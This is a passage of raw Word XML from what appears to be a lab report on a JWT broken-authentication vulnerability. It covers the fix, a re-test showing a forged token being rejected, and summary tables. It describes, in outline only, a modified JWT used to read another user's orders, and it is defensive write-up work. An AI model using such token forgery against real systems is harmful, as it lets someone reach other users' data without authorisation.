    <w:p w14:paraId="36808C12" w14:textId="69F6349B" w:rsidR="00BA72A1" w:rsidRDefault="00BA72A1" w:rsidP="00956299">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA72A1">
        <w:t>Fix Strategy / Probable Mitigation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2677F60E" w14:textId="5087631B" w:rsidR="005A10AE" w:rsidRDefault="005A10AE" w:rsidP="005A10AE">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>To fix this vulnerability:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63274A2E" w14:textId="77777777" w:rsidR="005A10AE" w:rsidRDefault="005A10AE" w:rsidP="005A10AE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Verify JWT signature using trusted public keys (JWKS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7555B168" w14:textId="77777777" w:rsidR="005A10AE" w:rsidRDefault="005A10AE" w:rsidP="005A10AE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Validate:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7383D5CB" w14:textId="77777777" w:rsidR="005A10AE" w:rsidRDefault="005A10AE" w:rsidP="005A10AE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>issuer (iss)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23ADC60F" w14:textId="77777777" w:rsidR="005A10AE" w:rsidRDefault="005A10AE" w:rsidP="005A10AE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>expiration (exp)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E922730" w14:textId="5C93E3EC" w:rsidR="00BA72A1" w:rsidRDefault="005A10AE" w:rsidP="005A10AE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Reject any modified or invalid tokens</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22A8F057" w14:textId="77777777" w:rsidR="00792587" w:rsidRDefault="00792587" w:rsidP="00BA72A1"/>
    <w:p w14:paraId="6796CFD0" w14:textId="3F83F2C2" w:rsidR="00BA72A1" w:rsidRDefault="00BA72A1" w:rsidP="00956299">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA72A1">
        <w:t>Code / Config Changes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27306589" w14:textId="515F7D7A" w:rsidR="00BA72A1" w:rsidRPr="008C0319" w:rsidRDefault="00D372F5" w:rsidP="00D372F5">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C0319">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Vulnerable Code:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34290027" w14:textId="70536148" w:rsidR="00A65256" w:rsidRDefault="00506A62" w:rsidP="00D372F5">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251660288" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="49C7EAF6" wp14:editId="1264D085">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1470660</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>796925</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2263140" cy="861060"/>
                <wp:effectExtent l="19050" t="19050" r="41910" b="34290"/>
                <wp:wrapNone/>
                <wp:docPr id="249040707" name="Rectangle 6"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="2263140" cy="861060"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:noFill/>
                        <a:ln w="5715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326131" id="Rectangle 6" o:spid="_x0000_s1026" style="position:absolute;margin-left:115.8pt;margin-top:62.75pt;width:178.2pt;height:67.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testQIAAOsFAAAOAAAAZHJzL2Uyb0RvYy54bWysVEtvEzEQviPxHyzf6SahTUvUTRX1gZCq&#10;tqJFPU+8dtaS7TG28+LXM/ZuklI4UMQevGPP+5vH+cXGGraSIWp0NR8eDTiTTmCj3aLm355uPpxx&#10;FhO4Bgw6WfOtjPxi+v7d+dpP5AhbNI0MjIy4OFn7mrcp+UlVRdFKC/EIvXTEVBgsJLqGRdUEWJN1&#10;a6rRYDCu1hgaH1DIGOn1qmPyabGvlBTpXqkoEzM1p9hSOUM55/mspucwWQTwrRZ9GPAPUVjQjpzu&#10;TV1BArYM+jdTVouAEVU6EmgrVEoLWXKgbIaDV9k8tuBlyYXAiX4PU/x/ZsXd6tE/BIJh7eMkEpmz&#10;2Khg85/iY5sC1nYPltwkJuhxNBp/HB4TpoJ4Z+PhYFzQrA7aPsT0WaJlmah5oGIUjGB1GxN5JNGd&#10;SHbm8EYbUwpiHFvX/OR0eJLtA/WFMpCItL6peXQLzsAsqOFECsVkRKObrJ4NxbCYX5rAVkBFv74e&#10;0JfrTO5+Ecu+ryC2nVxhde0QcOmaEkcrobl2DUtbT73rqIN5DszKhjMjyX+mimQCbf5GkoIwjmI5&#10;oF2otDUyh27cV6mYbgroJRfRJ9P1LA0VIbLr3GKMFLKgouTfqNurZG1ZRuWN+nul4h9d2utb7bAv&#10;TB5kua8GCCFdGvXlUJ3ODo4OhIzHHJvtQ2ABu3mNXtxoqtYtxPQAgQaUQKClk+7pUAapJNhTnLUY&#10;fvzpPcvT3BCXakgDT330fQmBKmq+OJqoT8Pj3M2pXI5PTkd0CS8585cct7SXSO01pPXmRSGzfDI7&#10;UgW0z7SbZtkrscAJ8t11bH+5TF1RabsJOZsVMdoKHtKte/QiG8/I5j592jxD8P0gJRrBO9wtB5i8&#10;mqdONms6nC0TKl2G7YBrjzdtlDIU/fbLK+vlvUgddvT0JwAAAP//AwBQSwMEFAAGAAgAAAAhABWJ&#10;WMrfAAAACwEAAA8AAABkcnMvZG93bnJldi54bWxMj9FOhDAQRd9N/IdmTHxzCxgIImVjjGvcuImK&#10;fkChIxDplNAui3/v+KSPk3ty59xyu9pRLDj7wZGCeBOBQGqdGahT8PG+u8pB+KDJ6NERKvhGD9vq&#10;/KzUhXEnesOlDp3gEvKFVtCHMBVS+rZHq/3GTUicfbrZ6sDn3Ekz6xOX21EmUZRJqwfiD72e8L7H&#10;9qs+WgXPTV3vH/a7xrw8vUbp8nhoppuDUpcX690tiIBr+IPhV5/VoWKnxh3JeDEqSK7jjFEOkjQF&#10;wUSa57yu4SiLY5BVKf9vqH4AAAD//wMAUEsBAi0AFAAGAAgAAAAhALaDOJL+AAAA4QEAABMAAAAA&#10;AAAAAAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAOP0h/9YAAACU&#10;AQAACwAAAAAAAAAAAAAAAAAvAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEA6YLXrLUCAADr&#10;BQAADgAAAAAAAAAAAAAAAAAuAgAAZHJzL2Uyb0RvYy54bWxQSwECLQAUAAYACAAAACEAFYlYyt8A&#10;AAALAQAADwAAAAAAAAAAAAAAAAAPBQAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA8wAAABsG&#10;AAAAAA==&#10;" filled="f" strokecolor="#e00" strokeweight="4.5pt">
                <v:stroke joinstyle="round"/>
              </v:rect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00B673EF" w:rsidRPr="00B673EF">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="70C85450" wp14:editId="703FC8C8">
            <wp:extent cx="5731510" cy="2513965"/>
            <wp:effectExtent l="0" t="0" r="2540" b="635"/>
            <wp:docPr id="209564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44766" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2513965"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="719FBAF2" w14:textId="2F477B3B" w:rsidR="00A65256" w:rsidRPr="008C0319" w:rsidRDefault="00A65256" w:rsidP="00A65256">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C0319">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Fixed Code:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="483E7FA7" w14:textId="7234842C" w:rsidR="008C0319" w:rsidRDefault="007D682F" w:rsidP="00A65256">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="63BF8C69" wp14:editId="2AB5CD7F">
            <wp:extent cx="3325618" cy="2750820"/>
            <wp:effectExtent l="0" t="0" r="8255" b="0"/>
            <wp:docPr id="39136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66869" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId12"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3329535" cy="2754060"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="62E855A6" w14:textId="77777777" w:rsidR="00FC5C3C" w:rsidRDefault="00FC5C3C" w:rsidP="00A65256">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2EB387E7" w14:textId="15898003" w:rsidR="00FC5C3C" w:rsidRDefault="00FC5C3C" w:rsidP="00A65256">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5700A298" wp14:editId="536FC33A">
            <wp:extent cx="4564380" cy="2458171"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="118120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08372" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId13"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4572587" cy="2462591"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="27023BA5" w14:textId="77777777" w:rsidR="00FC5C3C" w:rsidRDefault="00FC5C3C" w:rsidP="00A65256">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="567F9500" w14:textId="105A2093" w:rsidR="00FC5C3C" w:rsidRDefault="00FC5C3C" w:rsidP="00A65256">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6CA0601F" wp14:editId="2251A90A">
            <wp:extent cx="5731510" cy="2957195"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="41856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60123" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId14"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2957195"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F604850" w14:textId="77777777" w:rsidR="00FC5C3C" w:rsidRDefault="00FC5C3C" w:rsidP="00A65256">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="572362C3" w14:textId="57A40944" w:rsidR="00FC5C3C" w:rsidRDefault="00FC5C3C" w:rsidP="00A65256">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4B046472" wp14:editId="05CE81A2">
            <wp:extent cx="5731510" cy="1972310"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8890"/>
            <wp:docPr id="157977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78252" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId15"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1972310"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B32AAB1" w14:textId="59A63862" w:rsidR="009E4A75" w:rsidRDefault="005763B3" w:rsidP="00210805">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="308BDDD4" wp14:editId="749F9B20">
            <wp:extent cx="5731510" cy="2265680"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1270"/>
            <wp:docPr id="20336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8017" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId16"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2265680"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="58A8A6F8" w14:textId="3340FA1F" w:rsidR="00BA72A1" w:rsidRDefault="00BA72A1" w:rsidP="00956299">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA72A1">
        <w:t>Verification After Fix</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F5BF346" w14:textId="176641EE" w:rsidR="00BA72A1" w:rsidRDefault="009E4A75" w:rsidP="009E4A75">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009E4A75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 1: Re-run exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F9D60E6" w14:textId="23113552" w:rsidR="00BA72A1" w:rsidRDefault="00344EB7" w:rsidP="00BA72A1">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="66374442" wp14:editId="71427E07">
            <wp:extent cx="3238500" cy="1466850"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="142145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59595" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId17"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3238500" cy="1466850"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E079D54" w14:textId="215905C0" w:rsidR="00467607" w:rsidRDefault="00467607" w:rsidP="00467607">
      <w:r w:rsidRPr="00467607">
        <w:t>After applying the fix, the forged JWT token is rejected by the backend. The system now returns an error response indicating that the token is invalid. This confirms that JWT signature verification is successfully enforced.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="777756C2" w14:textId="77777777" w:rsidR="00BA72A1" w:rsidRDefault="00BA72A1" w:rsidP="00BA72A1"/>
    <w:p w14:paraId="47B0E760" w14:textId="1CD8C2F4" w:rsidR="00BA72A1" w:rsidRDefault="00BA72A1" w:rsidP="00956299">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA72A1">
        <w:t>Structured Operation and Security Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="187C3821" w14:textId="77777777" w:rsidR="00BA72A1" w:rsidRDefault="00BA72A1" w:rsidP="00BA72A1"/>
    <w:p w14:paraId="2DB8D432" w14:textId="2CFC7F12" w:rsidR="00D84B64" w:rsidRPr="00D84B64" w:rsidRDefault="00D84B64" w:rsidP="00D84B64">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:keepNext/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84B64">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Table </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84B64">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00D84B64">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Table \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00D84B64">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00D84B64">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84B64">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00D84B64">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: Structured analysis summary — Table A</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="9237" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1848"/>
        <w:gridCol w:w="1845"/>
        <w:gridCol w:w="1848"/>
        <w:gridCol w:w="1848"/>
        <w:gridCol w:w="1848"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D84B64" w14:paraId="25064DEE" w14:textId="77777777" w:rsidTr="00D84B64">
        <w:trPr>
          <w:trHeight w:val="902"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1848" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1EA0003F" w14:textId="77777777" w:rsidR="00D84B64" w:rsidRDefault="00D84B64" w:rsidP="00051D50">
            <w:r>
              <w:t>Vulnerability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1845" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7B3643E7" w14:textId="718552C6" w:rsidR="00D84B64" w:rsidRDefault="00D84B64" w:rsidP="00D84B64">
            <w:r w:rsidRPr="00D84B64">
              <w:t>Intended Rule(s)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1848" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6BD7FF02" w14:textId="55C3DDC6" w:rsidR="00D84B64" w:rsidRDefault="00D84B64" w:rsidP="00D84B64">
            <w:r w:rsidRPr="00D84B64">
              <w:t>Artifacts Used to Infer Rule</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1848" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4BCE5EBA" w14:textId="1DB1B243" w:rsidR="00D84B64" w:rsidRDefault="00D84B64" w:rsidP="00D84B64">
            <w:r w:rsidRPr="00D84B64">
              <w:t>Normal Behavior Evi dence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1848" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4714E1BB" w14:textId="423E2FBC" w:rsidR="00D84B64" w:rsidRDefault="00D84B64" w:rsidP="00D84B64">
            <w:r>
              <w:t>E</w:t>
            </w:r>
            <w:r w:rsidRPr="00D84B64">
              <w:t>xploit Behavior Evi dence</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D84B64" w14:paraId="3618346C" w14:textId="77777777" w:rsidTr="00D84B64">
        <w:trPr>
          <w:trHeight w:val="296"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1848" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7DE856EF" w14:textId="4644A5FD" w:rsidR="00D84B64" w:rsidRDefault="00A937FA" w:rsidP="00A937FA">
            <w:r w:rsidRPr="00A937FA">
              <w:t>Broken Authentication</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1845" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="555C06DC" w14:textId="5EBC57D9" w:rsidR="00D84B64" w:rsidRDefault="00A937FA" w:rsidP="00A937FA">
            <w:r w:rsidRPr="00A937FA">
              <w:t xml:space="preserve">Only verified JWT should determine user identity; User B must not </w:t>
            </w:r>
            <w:r w:rsidRPr="00A937FA">
              <w:lastRenderedPageBreak/>
              <w:t>access User C data</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1848" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="467FFF76" w14:textId="2A22D33F" w:rsidR="00D84B64" w:rsidRDefault="00A937FA" w:rsidP="00A937FA">
            <w:r w:rsidRPr="00A937FA">
              <w:lastRenderedPageBreak/>
              <w:t>DevTools (Authorization header), decoded JWT, curl requests, API responses</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1848" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="37782E08" w14:textId="29451338" w:rsidR="00D84B64" w:rsidRDefault="00A937FA" w:rsidP="00A937FA">
            <w:r w:rsidRPr="00A937FA">
              <w:t>Using TOKEN_B returns only User B orders</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1848" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="188AAC6B" w14:textId="01B70FAC" w:rsidR="00D84B64" w:rsidRDefault="00A937FA" w:rsidP="00A937FA">
            <w:r w:rsidRPr="00A937FA">
              <w:t xml:space="preserve">Modified JWT (FAKE_AS_C) allowed access to victim data or caused abnormal </w:t>
            </w:r>
            <w:r w:rsidRPr="00A937FA">
              <w:lastRenderedPageBreak/>
              <w:t>backend behavior</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7DBF25F8" w14:textId="77777777" w:rsidR="00D84B64" w:rsidRDefault="00D84B64" w:rsidP="00BA72A1"/>
    <w:p w14:paraId="64C42F67" w14:textId="77777777" w:rsidR="00D84B64" w:rsidRDefault="00D84B64" w:rsidP="00D84B64">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5010B3A8" w14:textId="007839E6" w:rsidR="00D84B64" w:rsidRPr="00D84B64" w:rsidRDefault="00D84B64" w:rsidP="00D84B64">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:keepNext/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84B64">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Table </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84B64">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00D84B64">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Table \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00D84B64">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84B64">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00D84B64">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: Structured analysis summary — Table B:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="9252" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1745"/>
        <w:gridCol w:w="1526"/>
        <w:gridCol w:w="1458"/>
        <w:gridCol w:w="1481"/>
